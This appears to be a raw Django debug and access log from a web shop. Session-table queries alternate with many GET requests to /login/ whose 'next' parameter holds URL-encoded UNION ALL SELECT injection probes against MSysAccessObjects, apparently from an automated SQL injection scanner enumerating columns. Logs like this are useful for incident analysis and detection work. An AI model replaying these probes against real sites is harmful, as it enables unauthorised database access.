/login/?next=%2F%20UNION%20ALL%20SELECT%2062%2C62%2C%27qxvkq%27%7C%7C%27gzwWNzEgIs%27%7C%7C%27qppzq%27%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%20FROM%20MSysAccessObjects--%20Gicx HTTP/1.0" 200 2186 DEBUG 2020-01-01 15:25:36,503 utils 2749 140297233225472 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'qxz93b5wl0tiwpk06medienyqxzjwxeu' LIMIT 1; args=('qxz93b5wl0tiwpk06medienyqxzjwxeu',) DEBUG 2020-01-01 15:25:36,505 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('qxz93b5wl0tiwpk06medienyqxzjwxeu', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:36.503890+00:00'::timestamptz); args=('qxz93b5wl0tiwpk06medienyqxzjwxeu', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 36, 503890, tzinfo=)) [01/Jan/2020 15:25:36] "GET /login/?next=%2F%20UNION%20ALL%20SELECT%2062%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C%27qxvkq%27%7C%7C%27XGfqYtRQhs%27%7C%7C%27qppzq%27%2C62%2C62%2C62%2C62%2C62%2C62%20FROM%20MSysAccessObjects--%20Leju HTTP/1.0" 200 2186 DEBUG 2020-01-01 15:25:36,658 utils 2749 140297233225472 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'ydxz5r929kt8kvvuxljbldud2sst46qi' LIMIT 1; args=('ydxz5r929kt8kvvuxljbldud2sst46qi',) DEBUG 2020-01-01 15:25:36,660 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('ydxz5r929kt8kvvuxljbldud2sst46qi', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:36.658690+00:00'::timestamptz); args=('ydxz5r929kt8kvvuxljbldud2sst46qi', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 36, 658690, tzinfo=)) [01/Jan/2020 15:25:36] "GET /login/?next=%2F%20UNION%20ALL%20SELECT%2062%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C%27qxvkq%27%7C%7C%27UZIpYdnmks%27%7C%7C%27qppzq%27%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%20FROM%20MSysAccessObjects--%20zKzL HTTP/1.0" 200 2186 DEBUG 2020-01-01 15:25:36,820 utils 2749 140297233225472 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = '3k75lhc47xw8qcdzt3nmbtdbxde3ddep' LIMIT 1; args=('3k75lhc47xw8qcdzt3nmbtdbxde3ddep',) DEBUG 2020-01-01 15:25:36,822 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('3k75lhc47xw8qcdzt3nmbtdbxde3ddep', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:36.820605+00:00'::timestamptz); args=('3k75lhc47xw8qcdzt3nmbtdbxde3ddep', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 36, 820605, tzinfo=)) [01/Jan/2020 15:25:36] "GET /login/?next=%2F%20UNION%20ALL%20SELECT%2062%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C%27qxvkq%27%7C%7C%27ByexCIqZgl%27%7C%7C%27qppzq%27%20FROM%20MSysAccessObjects--%20xOhl HTTP/1.0" 200 2186 DEBUG 2020-01-01 15:25:37,004 utils 2749 140297233225472 (0.006) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'm5ddi8gth0te85zez00p7k00y7idsybl' LIMIT 1; args=('m5ddi8gth0te85zez00p7k00y7idsybl',) DEBUG 2020-01-01 15:25:37,007 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('m5ddi8gth0te85zez00p7k00y7idsybl', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:37.005155+00:00'::timestamptz); args=('m5ddi8gth0te85zez00p7k00y7idsybl', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 37, 5155, tzinfo=)) [01/Jan/2020 15:25:37] "GET /login/?next=%2F%20UNION%20ALL%20SELECT%2062%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C%27qxvkq%27%7C%7C%27kimirOzZrv%27%7C%7C%27qppzq%27%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%20FROM%20MSysAccessObjects--%20oSNs HTTP/1.0" 200 2186 DEBUG 2020-01-01 15:25:37,185 utils 2749 140297233225472 (0.005) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = '970iktwhpsabkwfgauerpdxs1x59j0vz' LIMIT 1; args=('970iktwhpsabkwfgauerpdxs1x59j0vz',) DEBUG 2020-01-01 15:25:37,188 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('970iktwhpsabkwfgauerpdxs1x59j0vz', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:37.185798+00:00'::timestamptz); args=('970iktwhpsabkwfgauerpdxs1x59j0vz', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 37, 185798, tzinfo=)) [01/Jan/2020 15:25:37] "GET /login/?next=%2F%20UNION%20ALL%20SELECT%2062%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C%27qxvkq%27%7C%7C%27wWcuZKadMy%27%7C%7C%27qppzq%27%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%20FROM%20MSysAccessObjects--%20wDPE HTTP/1.0" 200 2186 DEBUG 2020-01-01 15:25:37,348 utils 2749 140297233225472 (0.005) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = '3z41dsgo4h3apcshjq7odyocdes7fmi2' LIMIT 1; args=('3z41dsgo4h3apcshjq7odyocdes7fmi2',) DEBUG 2020-01-01 15:25:37,350 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('3z41dsgo4h3apcshjq7odyocdes7fmi2', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:37.348635+00:00'::timestamptz); args=('3z41dsgo4h3apcshjq7odyocdes7fmi2', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 37, 348635, tzinfo=)) [01/Jan/2020 15:25:37] "GET /login/?next=%2F%20UNION%20ALL%20SELECT%2062%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C%27qxvkq%27%7C%7C%27yUoauJALNG%27%7C%7C%27qppzq%27%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%20FROM%20MSysAccessObjects--%20gQzz HTTP/1.0" 200 2186 DEBUG 2020-01-01 15:25:37,514 utils 2749 140297233225472 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'b36f8zkxrqjcsx8cfxalo0rxovperwyc' LIMIT 1; args=('b36f8zkxrqjcsx8cfxalo0rxovperwyc',) DEBUG 2020-01-01 15:25:37,517 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('b36f8zkxrqjcsx8cfxalo0rxovperwyc', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:37.515173+00:00'::timestamptz); args=('b36f8zkxrqjcsx8cfxalo0rxovperwyc', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 37, 515173, tzinfo=)) [01/Jan/2020 15:25:37] "GET /login/?next=-4998%20UNION%20ALL%20SELECT%2062%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C%27qxvkq%27%7C%7C%27TRBqLMhNGFZvGirNbfaRcRMEMuVLTDXEHiARXtxj%27%7C%7C%27qppzq%27%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%20FROM%20MSysAccessObjects--%20sVRW HTTP/1.0" 200 2252 DEBUG 2020-01-01 15:25:37,666 utils 2749 140297233225472 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'ytcpiqihkpcngd1uav3fwrycf6ynkwjv' LIMIT 1; args=('ytcpiqihkpcngd1uav3fwrycf6ynkwjv',) DEBUG 2020-01-01 15:25:37,668 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('ytcpiqihkpcngd1uav3fwrycf6ynkwjv', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:37.667350+00:00'::timestamptz); args=('ytcpiqihkpcngd1uav3fwrycf6ynkwjv', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 37, 667350, tzinfo=)) [01/Jan/2020 15:25:37] "GET /login/?next=-8913%20UNION%20ALL%20SELECT%2062%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C%27qxvkq%27%7C%7C%27wKoLcJtmrLgOVgTtMQMXxdFbmOJlVTJGKIZQNoJM%27%7C%7C%27qppzq%27%2C62%2C62%20FROM%20MSysAccessObjects--%20bsJF HTTP/1.0" 200 2252 DEBUG 2020-01-01 15:25:37,835 utils 2749 140297233225472 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = '6rnq8asdpo1trcoy4tqezmfb7gakff5o' LIMIT 1; args=('6rnq8asdpo1trcoy4tqezmfb7gakff5o',) DEBUG 2020-01-01 15:25:37,837 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('6rnq8asdpo1trcoy4tqezmfb7gakff5o', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:37.835708+00:00'::timestamptz); args=('6rnq8asdpo1trcoy4tqezmfb7gakff5o', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 37, 835708, tzinfo=)) [01/Jan/2020 15:25:37] "GET /login/?next=-3389%20UNION%20ALL%20SELECT%2062%2C62%2C62%2C62%2C62%2C62%2C62%2C%27qxvkq%27%7C%7C%27fbFlnJLjevHgBFgmXCuAnNFQvElpHdjYXvLDukdm%27%7C%7C%27qppzq%27%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%20FROM%20MSysAccessObjects--%20Kmfa HTTP/1.0" 200 2252 DEBUG 2020-01-01 15:25:37,998 utils 2749 140297233225472 (0.002) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'z0mq9lduvri9amvq8i9z7vxqwgug3spm' LIMIT 1; args=('z0mq9lduvri9amvq8i9z7vxqwgug3spm',) DEBUG 2020-01-01 15:25:37,999 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('z0mq9lduvri9amvq8i9z7vxqwgug3spm', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:37.998451+00:00'::timestamptz); args=('z0mq9lduvri9amvq8i9z7vxqwgug3spm', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 37, 998451, tzinfo=)) [01/Jan/2020 15:25:38] "GET /login/?next=-3906%20UNION%20ALL%20SELECT%2062%2C62%2C62%2C%27qxvkq%27%7C%7C%27YMoVbpfDImspxfIzrJlFRomNKYKIdAfPWZsLlXnz%27%7C%7C%27qppzq%27%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%20FROM%20MSysAccessObjects--%20hphh HTTP/1.0" 200 2252 DEBUG 2020-01-01 15:25:38,133 utils 2749 140297233225472 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'c6ums0y3antib23uu9j3brz9v5wwaehw' LIMIT 1; args=('c6ums0y3antib23uu9j3brz9v5wwaehw',) DEBUG 2020-01-01 15:25:38,134 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('c6ums0y3antib23uu9j3brz9v5wwaehw', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:38.133518+00:00'::timestamptz); args=('c6ums0y3antib23uu9j3brz9v5wwaehw', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 38, 133518, tzinfo=)) [01/Jan/2020 15:25:38] "GET /login/?next=-9702%20UNION%20ALL%20SELECT%2062%2C%27qxvkq%27%7C%7C%27MqUzFoeDjxFxSaUPhhSFghkvUsekmphIvnWEEFIe%27%7C%7C%27qppzq%27%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%20FROM%20MSysAccessObjects--%20pMZc HTTP/1.0" 200 2252 DEBUG 2020-01-01 15:25:38,281 utils 2749 140297233225472 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'v7zq2bmeh1c10ana366krb500w8dnlkk' LIMIT 1; args=('v7zq2bmeh1c10ana366krb500w8dnlkk',) DEBUG 2020-01-01 15:25:38,283 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('v7zq2bmeh1c10ana366krb500w8dnlkk', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:38.281919+00:00'::timestamptz); args=('v7zq2bmeh1c10ana366krb500w8dnlkk', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 38, 281919, tzinfo=)) [01/Jan/2020 15:25:38] "GET /login/?next=-9158%20UNION%20ALL%20SELECT%2062%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C%27qxvkq%27%7C%7C%27tLmFZgHGZPdoVcOKbYHJMRcebAwEaSVrqCqSYFZA%27%7C%7C%27qppzq%27%2C62%2C62%2C62%2C62%2C62%20FROM%20MSysAccessObjects--%20ZzBC HTTP/1.0" 200 2252 DEBUG 2020-01-01 15:25:38,441 utils 2749 140297233225472 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'yljsgsgnofb1i5apgumry8kswczgoe3s' LIMIT 1; args=('yljsgsgnofb1i5apgumry8kswczgoe3s',) DEBUG 2020-01-01 15:25:38,443 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('yljsgsgnofb1i5apgumry8kswczgoe3s', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:38.441696+00:00'::timestamptz); args=('yljsgsgnofb1i5apgumry8kswczgoe3s', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 38, 441696, tzinfo=)) [01/Jan/2020 15:25:38] "GET /login/?next=-2999%20UNION%20ALL%20SELECT%2062%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C%27qxvkq%27%7C%7C%27QrEwuHYeoscLZHiKDlCrKJejhNzzFxLIlyhGSorI%27%7C%7C%27qppzq%27%2C62%2C62%2C62%20FROM%20MSysAccessObjects--%20qcaW HTTP/1.0" 200 2252 DEBUG 2020-01-01 15:25:38,580 utils 2749 140297233225472 (0.002) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'fx7y7znsbofqxxzujg2yulre4k64qowh' LIMIT 1; args=('fx7y7znsbofqxxzujg2yulre4k64qowh',) DEBUG 2020-01-01 15:25:38,581 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('fx7y7znsbofqxxzujg2yulre4k64qowh', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:38.580563+00:00'::timestamptz); args=('fx7y7znsbofqxxzujg2yulre4k64qowh', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 38, 580563, tzinfo=)) [01/Jan/2020 15:25:38] "GET /login/?next=-3924%20UNION%20ALL%20SELECT%2062%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C%27qxvkq%27%7C%7C%27bxubLOvtAoymfbQmWVfQjWmWNpEKhnKBFLLVTEWL%27%7C%7C%27qppzq%27%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%20FROM%20MSysAccessObjects--%20CVgW HTTP/1.0" 200 2252 DEBUG 2020-01-01 15:25:38,809 utils 2749 140297233225472 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = '1sntscahsimoet6qgc1xhu5ih4fdekqe' LIMIT 1; args=('1sntscahsimoet6qgc1xhu5ih4fdekqe',) DEBUG 2020-01-01 15:25:38,811 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('1sntscahsimoet6qgc1xhu5ih4fdekqe', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:38.810370+00:00'::timestamptz); args=('1sntscahsimoet6qgc1xhu5ih4fdekqe', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 38, 810370, tzinfo=)) [01/Jan/2020 15:25:38] "GET /login/?next=-7872%20UNION%20ALL%20SELECT%2062%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C%27qxvkq%27%7C%7C%27LSuaDHbmddCdaglLMjXCriqCQbNVuqzfWvAqPuGl%27%7C%7C%27qppzq%27%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%20FROM%20MSysAccessObjects--%20zBbr HTTP/1.0" 200 2252 DEBUG 2020-01-01 15:25:38,993 utils 2749 140297233225472 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'q3vgdwzof0zljeedi31sbljb2grdd9o4' LIMIT 1; args=('q3vgdwzof0zljeedi31sbljb2grdd9o4',) DEBUG 2020-01-01 15:25:38,995 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('q3vgdwzof0zljeedi31sbljb2grdd9o4', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:38.993842+00:00'::timestamptz); args=('q3vgdwzof0zljeedi31sbljb2grdd9o4', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 38, 993842, tzinfo=)) [01/Jan/2020 15:25:38] "GET /login/?next=-5167%20UNION%20ALL%20SELECT%2062%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C%27qxvkq%27%7C%7C%27QfKuixjatMHVWeeVqfgOuqeHMUHAozOXMLmbyLOQ%27%7C%7C%27qppzq%27%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%20FROM%20MSysAccessObjects--%20cZfX HTTP/1.0" 200 2252 DEBUG 2020-01-01 15:25:39,134 utils 2749 140297233225472 (0.002) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'v2cbwrr6xf7099yztqvb7wfhn0sai35i' LIMIT 1; args=('v2cbwrr6xf7099yztqvb7wfhn0sai35i',) DEBUG 2020-01-01 15:25:39,135 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('v2cbwrr6xf7099yztqvb7wfhn0sai35i', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:39.134501+00:00'::timestamptz); args=('v2cbwrr6xf7099yztqvb7wfhn0sai35i', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 39, 134501, tzinfo=)) [01/Jan/2020 15:25:39] "GET /login/?next=-4701%20UNION%20ALL%20SELECT%2062%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C%27qxvkq%27%7C%7C%27oKhaSNQBXnNvGymaezQnMOElptUoNFexSTIbcvqA%27%7C%7C%27qppzq%27%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%20FROM%20MSysAccessObjects--%20EqPB HTTP/1.0" 200 2252 DEBUG 2020-01-01 15:25:39,274 utils 2749 140297233225472 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'temf2fpe8mcl7drbuexq0i3nv9kqkj91' LIMIT 1; args=('temf2fpe8mcl7drbuexq0i3nv9kqkj91',) DEBUG 2020-01-01 15:25:39,276 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('temf2fpe8mcl7drbuexq0i3nv9kqkj91', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:39.274899+00:00'::timestamptz); args=('temf2fpe8mcl7drbuexq0i3nv9kqkj91', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 39, 274899, tzinfo=)) [01/Jan/2020 15:25:39] "GET /login/?next=-5400%20UNION%20ALL%20SELECT%2062%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C%27qxvkq%27%7C%7C%27LshKuaVLZgwgCkFvrjoECiRcDIbaXHeRJZrHREmq%27%7C%7C%27qppzq%27%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%20FROM%20MSysAccessObjects--%20bYEB HTTP/1.0" 200 2252 DEBUG 2020-01-01 15:25:39,430 utils 2749 140297233225472 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'r1ixzk24oossjxwscanpefxkfrjts6gy' LIMIT 1; args=('r1ixzk24oossjxwscanpefxkfrjts6gy',) DEBUG 2020-01-01 15:25:39,432 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('r1ixzk24oossjxwscanpefxkfrjts6gy', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:39.431108+00:00'::timestamptz); args=('r1ixzk24oossjxwscanpefxkfrjts6gy', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 39, 431108, tzinfo=)) [01/Jan/2020 15:25:39] "GET /login/?next=-8300%20UNION%20ALL%20SELECT%2062%2C62%2C62%2C62%2C62%2C62%2C%27qxvkq%27%7C%7C%27zZkDggbkOhKBmqLuEbkslrevAyVyVHgblTmAECIV%27%7C%7C%27qppzq%27%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%20FROM%20MSysAccessObjects--%20Sxiw HTTP/1.0" 200 2252 DEBUG 2020-01-01 15:25:39,565 utils 2749 140297233225472 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'pt236m915esn1i542dqwinakxbmfcxm3' LIMIT 1; args=('pt236m915esn1i542dqwinakxbmfcxm3',) DEBUG 2020-01-01 15:25:39,567 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('pt236m915esn1i542dqwinakxbmfcxm3', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:39.566058+00:00'::timestamptz); args=('pt236m915esn1i542dqwinakxbmfcxm3', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 39, 566058, tzinfo=)) [01/Jan/2020 15:25:39] "GET /login/?next=-7118%20UNION%20ALL%20SELECT%2062%2C62%2C62%2C62%2C%27qxvkq%27%7C%7C%27vbBRAxFCHorfGObMZXogtxBFxqUcMvnEOQBNNawf%27%7C%7C%27qppzq%27%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%20FROM%20MSysAccessObjects--%20mUCX HTTP/1.0" 200 2252 DEBUG 2020-01-01 15:25:39,727 utils 2749 140297233225472 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'mlvcz6anuhczfpdet0lwznjjqh3exkuj' LIMIT 1; args=('mlvcz6anuhczfpdet0lwznjjqh3exkuj',) DEBUG 2020-01-01 15:25:39,729 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('mlvcz6anuhczfpdet0lwznjjqh3exkuj', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', 